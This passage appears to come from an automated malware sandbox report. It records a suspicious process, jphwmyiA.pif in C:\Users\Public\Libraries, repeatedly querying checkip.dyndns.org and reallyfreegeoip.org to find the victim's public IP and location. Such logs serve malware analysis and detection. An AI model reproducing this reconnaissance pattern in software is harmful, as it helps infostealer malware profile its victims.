                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.553630132.226.8.169807208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:23.520108938 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:24.304143906 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:24.519486904 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.553650132.226.8.169807820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:25.818768024 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:26.919437885 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:26 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.553662132.226.8.169807820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:27.580108881 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:28.345350027 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:28 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.553671132.226.8.169807820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:29.069691896 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:29.843044043 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:29 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.553681132.226.8.169808016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:30.174958944 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:30.936165094 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:30 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:30.941059113 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:31.189481020 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:31 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:31.399454117 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:31 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 6, 2025 07:54:32.567589998 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:32.820883989 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:32 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.553683132.226.8.169807820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:30.441075087 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:31.215025902 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:31 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.553694132.226.8.169807820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:31.846843958 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:32.604804039 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:32 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.553709132.226.8.169807820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:33.209072113 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:33.990097046 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:33 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.553711132.226.8.169808016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:33.447262049 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:34.212887049 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:34 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.553723132.226.8.169807820C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:34.648036003 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:35.397993088 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.553724132.226.8.169808016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:34.891937017 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:35.639106989 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.553738132.226.8.169808016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:36.253647089 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 6, 2025 07:54:37.041984081 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:36 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.553750132.226.8.169808016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:37.730009079 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:38.493609905 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:38 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.553759132.226.8.169808016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:39.123497963 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:39.896935940 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:39 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.553771132.226.8.169808016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:40.676455975 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:41.468208075 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:41 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          25192.168.2.553782132.226.8.169808016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:42.075858116 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 6, 2025 07:54:42.849483967 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:42 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.549726188.114.97.34437208C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:13 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:13 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:13 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461242
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
